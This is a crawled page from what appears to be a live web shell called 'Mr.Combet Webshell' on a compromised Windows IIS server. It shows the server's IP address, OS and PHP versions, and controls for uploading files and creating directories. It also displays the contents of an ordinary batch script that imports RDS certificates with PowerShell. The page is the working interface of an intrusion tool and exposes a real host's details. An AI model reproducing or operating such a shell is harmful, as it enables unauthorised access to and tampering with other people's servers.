Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
SSL Manager
/
Scripts
/
View File Name :
PSRDSCerts.bat
REM Batch script to run each RDS import script sequentially REM Spaces are not supported in script path REM Must pass the thumbprint as the only parameter REM Ex. "./Scripts/PSRDSCerts.bat {5}" powershell.exe -ExecutionPolicy RemoteSigned -File ./Scripts/ImportRDListener.ps1 %* powershell.exe -ExecutionPolicy RemoteSigned -File ./Scripts/ImportRDGateway.ps1 %*